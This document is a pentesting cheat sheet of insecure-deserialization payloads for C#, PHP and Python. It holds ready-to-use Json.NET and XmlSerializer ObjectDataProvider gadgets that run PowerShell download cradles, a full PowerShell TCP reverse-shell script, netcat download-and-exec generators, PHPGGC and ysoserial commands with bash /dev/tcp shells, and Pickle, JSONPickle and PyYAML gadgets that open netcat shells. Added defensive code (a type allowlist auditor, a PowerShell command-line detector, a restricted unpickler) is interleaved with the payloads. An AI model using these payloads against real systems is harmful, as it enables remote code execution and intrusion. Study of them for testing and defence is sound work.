Deserialization

C#

Json.NET

ObjectDataProvider gadget (example 1)

{
    "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
    "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "MethodParameters": {
        "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
        "$values": [
            "powershell.exe",
            "IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/reverse-shell.ps1')"
        ]
    },
    "MethodName": "Start"
}

ObjectDataProvider gadget (example 2)

{
    "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
    "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "MethodParameters": {
        "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
        "$values": [
            "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
            "-WindowStyle Hidden -NonInteractive -exec bypass -enc <base64-payload>"
        ]
    },
    "MethodName": "Start"
}

XmlSerializer

ObjectDataProvider gadget (example 1)

<?xml version="1.0"?>
<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <ProjectedProperty0>
    <ObjectInstance xsi:type="XamlReader" />
    <MethodName>Parse</MethodName>
    <MethodParameters>
      <anyType xsi:type="xsd:string">&lt;ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"&gt;&lt;ObjectDataProvider.ObjectInstance&gt;&lt;sd:Process&gt;&lt;sd:Process.StartInfo&gt;&lt;sd:ProcessStartInfo Arguments="IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/reverse-shell.ps1')" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="powershell.exe"&gt;&lt;/sd:ProcessStartInfo&gt;&lt;/sd:Process.StartInfo&gt;&lt;/sd:Process&gt;&lt;/ObjectDataProvider.ObjectInstance&gt;&lt;/ObjectDataProvider&gt;</anyType>
    </MethodParameters>
  </ProjectedProperty0>
</Example>

ObjectDataProvider gadget (example 2)

<?xml version="1.0"?>
<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <ProjectedProperty0>
    <ObjectInstance xsi:type="XamlReader" />
    <MethodName>Parse</MethodName>
    <MethodParameters>
      <anyType xsi:type="xsd:string">&lt;ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"&gt;&lt;ObjectDataProvider.ObjectInstance&gt;&lt;sd:Process&gt;&lt;sd:Process.StartInfo&gt;&lt;sd:ProcessStartInfo Arguments="-WindowStyle Hidden -NonInteractive -exec bypass -enc <base64-payload>" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"&gt;&lt;/sd:ProcessStartInfo&gt;&lt;/sd:Process.StartInfo&gt;&lt;/sd:Process&gt;&lt;/ObjectDataProvider.ObjectInstance&gt;&lt;/ObjectDataProvider&gt;</anyType>
    </MethodParameters>
  </ProjectedProperty0>
</Example>

Type

System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
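The Json.NET and XmlSerializer payloads above all depend on the deserializer honouring a type name supplied by the caller (a "$type" hint, an xsi:type, or the ExpandedWrapper generic argument). The following Python is an added example, not code from the original page: it audits an inbound JSON or XML document the way a deny-by-default SerializationBinder would, accepting only an allowlist of expected types and reporting which of the gadget type names from this page it saw. The allowlist entries (MyApp.Models.*), the helper names and the placeholder values (BASE64_PLACEHOLDER) are assumptions made for the example.

```python
import json
import xml.etree.ElementTree as ET

# Constructed allowlist: the concrete types this hypothetical application expects in a
# "$type" hint; it plays the role a custom ISerializationBinder plays in Json.NET.
ALLOWED_TYPES = {"MyApp.Models.Order", "MyApp.Models.Customer"}

# Type names that occur in the ObjectDataProvider / XamlReader / ExpandedWrapper chains above.
GADGET_TYPES = (
    "System.Windows.Data.ObjectDataProvider",
    "System.Windows.Markup.XamlReader",
    "System.Data.Services.Internal.ExpandedWrapper",
    "System.Diagnostics.Process",
    "MS.Internal.Data.ParameterCollection",
)
XSI = "http://www.w3.org/2001/XMLSchema-instance"
XAML_GADGET_ELEMENTS = {"ObjectDataProvider", "Process", "ProcessStartInfo"}


def type_name(hint: str) -> str:
    """Drop the assembly-qualified tail: 'A.B, Asm, Version=...' -> 'A.B'."""
    return hint.split(",", 1)[0].strip()


def is_gadget_type(name: str) -> bool:
    return any(name.startswith(g) for g in GADGET_TYPES)


def collect_type_hints(node, found=None):
    """Walk a parsed JSON document and gather every "$type" value, nested ones included."""
    if found is None:
        found = []
    if isinstance(node, dict):
        if isinstance(node.get("$type"), str):
            found.append(node["$type"])
        for value in node.values():
            collect_type_hints(value, found)
    elif isinstance(node, list):
        for value in node:
            collect_type_hints(value, found)
    return found


def audit_json(raw: str) -> dict:
    """Deny by default: any "$type" outside the allowlist blocks the whole document."""
    hints = [type_name(h) for h in collect_type_hints(json.loads(raw))]
    return {
        "type_hints": hints,
        "gadget_hits": [h for h in hints if is_gadget_type(h)],
        "verdict": "block" if any(h not in ALLOWED_TYPES for h in hints) else "allow",
    }


def audit_xml(raw: str) -> dict:
    """Flag xsi:type="XamlReader" and gadget elements inside an embedded XAML document."""
    xsi_types, hits = [], []
    for el in ET.fromstring(raw).iter():
        declared = el.get(f"{{{XSI}}}type")
        if declared:
            xsi_types.append(declared)
            if declared.endswith("XamlReader"):
                hits.append(declared)
        # the XamlReader.Parse chain carries a second, entity-encoded XML document as element text
        text = (el.text or "").lstrip()
        if text.startswith("<"):
            try:
                inner = ET.fromstring(text)
            except ET.ParseError:
                continue
            for inner_el in inner.iter():
                local = inner_el.tag.rsplit("}", 1)[-1]
                if local in XAML_GADGET_ELEMENTS:
                    hits.append(local)
    return {"xsi_types": xsi_types, "gadget_hits": hits, "verdict": "block" if hits else "allow"}


# Constructed samples shaped like the payloads above; BASE64_PLACEHOLDER stands in for a real argument.
JSON_GADGET = """{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
  "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
  "MethodParameters": {
    "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
    "$values": ["powershell.exe", "-enc BASE64_PLACEHOLDER"]
  },
  "MethodName": "Start"
}"""
JSON_BENIGN = '{"$type": "MyApp.Models.Order, MyApp", "Id": 7, "Customer": {"$type": "MyApp.Models.Customer, MyApp"}}'
XML_GADGET = (
    '<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ProjectedProperty0>'
    '<ObjectInstance xsi:type="XamlReader"/><MethodName>Parse</MethodName><MethodParameters>'
    '<anyType xsi:type="xsd:string">&lt;ObjectDataProvider MethodName="Start" '
    'xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" '
    'xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"&gt;&lt;ObjectDataProvider.ObjectInstance&gt;'
    '&lt;sd:Process&gt;&lt;sd:Process.StartInfo&gt;&lt;sd:ProcessStartInfo FileName="powershell.exe" '
    'Arguments="-enc BASE64_PLACEHOLDER"/&gt;&lt;/sd:Process.StartInfo&gt;&lt;/sd:Process&gt;'
    '&lt;/ObjectDataProvider.ObjectInstance&gt;&lt;/ObjectDataProvider&gt;</anyType>'
    '</MethodParameters></ProjectedProperty0></Example>'
)
EXPANDED_WRAPPER = "System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework]], System.Data.Services"

if __name__ == "__main__":
    for sample in (JSON_GADGET, JSON_BENIGN):
        print(audit_json(sample))
    print(audit_xml(XML_GADGET), is_gadget_type(type_name(EXPANDED_WRAPPER)))
```

The verdict in audit_json never depends on recognising a gadget: anything outside the allowlist is blocked, which is the same effect as leaving Json.NET at TypeNameHandling.None or installing a binder that only returns the application's own types. The gadget_hits list exists for logging and alerting, so that a blocked request naming ObjectDataProvider or ExpandedWrapper can be told apart from a client that merely sent an unexpected but harmless type.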

Reverse shell

Example 1

# Attacker machine
## reverse shell (reverse-shell.ps1)
$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP-address>',<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
## HTTP server
python3 -m http.server 80
## Netcat
nc -lvnp <listen-port>

Example 2

# Attacker machine
## Download netcat
wget https://raw.githubusercontent.com/MrW0l05zyn/pentesting/refs/heads/master/windows/shell/netcat/netcat-x64.exe
mv netcat-x64.exe nc.exe
## HTTP server
python3 -m http.server 80
## Base64 payload generation
python3 -c 'import base64; print(base64.b64encode((r"""(new-object net.webclient).downloadfile("http://<attacker-IP-address>:80/nc.exe", "c:\windows\tasks\nc.exe");c:\windows\tasks\nc.exe -nv <attacker-IP-address> <listen-port> -e c:\windows\system32\cmd.exe;""").encode("utf-16-le")).decode())'
## Netcat
nc -lvnp <listen-port>
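Both examples above end in a powershell.exe process whose command line is either a visible download cradle or a -enc argument carrying a base64-encoded UTF-16LE script. The following Python is an added example, not part of the original page: it takes process-creation command lines (the shape Sysmon Event ID 1 or Security event 4688 records them in), decodes any encoded command, and matches indicators drawn from the two examples against the raw and decoded text. The sample command lines, the hosts (ATTACKER_IP) and ports, the indicator labels and the scoring threshold are all constructed for this example.

```python
import base64
import binascii
import re

# Constructed process-creation command lines; the placeholders stand in for real hosts and
# ports, and the shapes mirror the two examples above plus one benign scheduled script.
NC_SCRIPT = (
    '(new-object net.webclient).downloadfile("http://ATTACKER_IP:80/nc.exe", "c:\\windows\\tasks\\nc.exe");'
    "c:\\windows\\tasks\\nc.exe -nv ATTACKER_IP 4444 -e c:\\windows\\system32\\cmd.exe;"
)
SAMPLE_COMMAND_LINES = [
    "powershell.exe IEX(New-Object Net.WebClient).downloadString('http://ATTACKER_IP:80/reverse-shell.ps1')",
    "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden -NonInteractive "
    "-exec bypass -enc " + base64.b64encode(NC_SCRIPT.encode("utf-16-le")).decode(),
    "powershell.exe -NoProfile -File C:\\scripts\\nightly-backup.ps1",
]

# Indicators taken from the examples above, as (label, pattern) pairs.
INDICATORS = [
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I)),
    ("inline_execution", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("policy_bypass", re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("netcat_exec", re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s", re.I)),
    ("tcp_client", re.compile(r"net\.sockets\.tcpclient", re.I)),
]
# PowerShell accepts -e, -ec, -enc and -EncodedCommand; longest alternative first.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -enc/-EncodedCommand (base64 of UTF-16LE), or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Decode any encoded command, then match the indicators against raw and decoded text together."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + ("\n" + decoded if decoded else "")
    hits = [label for label, pattern in INDICATORS if pattern.search(haystack)]
    # constructed threshold: two independent indicators is enough to raise an alert
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyze_command_line(line))
```

Matching against the decoded text is what makes the second example visible: the raw command line of a -enc invocation contains only the policy and window-style switches, and the download and the nc.exe -e execution only appear once the base64 is turned back into a UTF-16LE string.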

Tools

YSoSerial.NET

# General
.\ysoserial.exe -f <formatter> -g <gadget> -c <payload> -o <output>
# Json.Net / Gadget ObjectDataProvider
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -c "<payload>" -o Raw
# XmlSerializer / Gadget ObjectDataProvider
.\ysoserial.exe -f XmlSerializer -g ObjectDataProvider -c "<payload>" -o Raw

PHP

Tools

PHPGGC

List available gadget chains.

phpggc -l
phpggc -l <framework>

Generate a payload using a specific gadget chain.

phpggc <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -b
phpggc <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b

Generate a PHAR file using a specific gadget chain.

phpggc -p phar <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -o file.phar
phpggc -p phar <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
http://example.com/?file=uploads/file.txt
http://example.com/?file=phar://uploads/file.phar

Python

Pickle

import base64, pickle, os

class RCE:
	# __reduce__ tells pickle which callable to invoke, and with which arguments, when the object is loaded
	def __reduce__(self):
		payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
		return os.system, (payload,)

print(base64.b64encode(pickle.dumps(RCE())).decode())

JSONPickle

import jsonpickle, os

class RCE:
	def __reduce__(self):
		payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
		return os.system, (payload,)

print(jsonpickle.encode(RCE()))

PyYAML

import yaml, subprocess

class RCE:
	def __reduce__(self):
		# __reduce__ must return (callable, args); calling Popen here would run it locally at dump time instead
		return subprocess.Popen, (["nc", "-nv", "<attacker-IP-address>", "<listen-port>", "-e", "/bin/bash"],)

print(yaml.dump(RCE()))
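The Pickle, JSONPickle and PyYAML payloads above all rely on the same mechanism: the loader resolves a module and attribute name taken from the data (os.system, subprocess.Popen) and calls it. The following Python is an added example, not code from the original page, showing the two defensive counterparts for pickle: a static pass over the opcode stream that lists every global a pickle would import without executing anything, and a pickle.Unpickler subclass whose find_class only resolves an allowlist. The allowlist contents and the sample pickles are constructed for the example; the gadget samples keep the __reduce__ shape shown above but name a harmless command so the demonstration itself is inert.

```python
import io
import pickle
import pickletools

# Constructed allowlist: the only globals this hypothetical application needs to unpickle.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("collections", "OrderedDict"),
    ("datetime", "datetime"),
}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes):
    """List every (module, name) the pickle would import, by reading opcodes without executing any."""
    found, recent_strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":            # protocols 0-3: "module name" as one argument
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name in STRING_OPS:        # remember pushed strings for STACK_GLOBAL
            recent_strings.append(arg)
        elif opcode.name == "STACK_GLOBAL":    # protocol 4+: module and name come from the stack
            if len(recent_strings) >= 2:
                found.append((recent_strings[-2], recent_strings[-1]))
    return found


def safe_to_load(data: bytes) -> bool:
    """Static pre-check: True only when every referenced global is on the allowlist."""
    return all(g in ALLOWED_GLOBALS for g in referenced_globals(data))


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only allowlisted globals; os.system, subprocess.Popen and the like are refused."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Constructed samples. The two gadget pickles call os.system with a harmless command:
# protocol 0 uses the GLOBAL opcode, protocol 4 uses STACK_GLOBAL.
GADGET_PROTO0 = b"cos\nsystem\n(Vecho constructed-sample\ntR."
GADGET_PROTO4 = b"\x80\x04\x8c\x02os\x8c\x06system\x93\x8c\x04true\x85R."
BENIGN = pickle.dumps({"user": "alice", "roles": ["reader"]})

if __name__ == "__main__":
    for label, sample in (("proto0", GADGET_PROTO0), ("proto4", GADGET_PROTO4), ("benign", BENIGN)):
        print(label, referenced_globals(sample), safe_to_load(sample))
    print(restricted_loads(BENIGN))
```

The static pass is a triage aid (it lets a collector report which globals a stored blob would pull in), but the enforcement point is find_class: the unpickler calls it for both GLOBAL and STACK_GLOBAL, so a gadget is refused before REDUCE can run. The same deny-by-default idea is what yaml.safe_load applies to the !!python/object/apply tags that yaml.dump emits above, and jsonpickle.decode offers a safe flag with the same intent.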

Tools

PEAS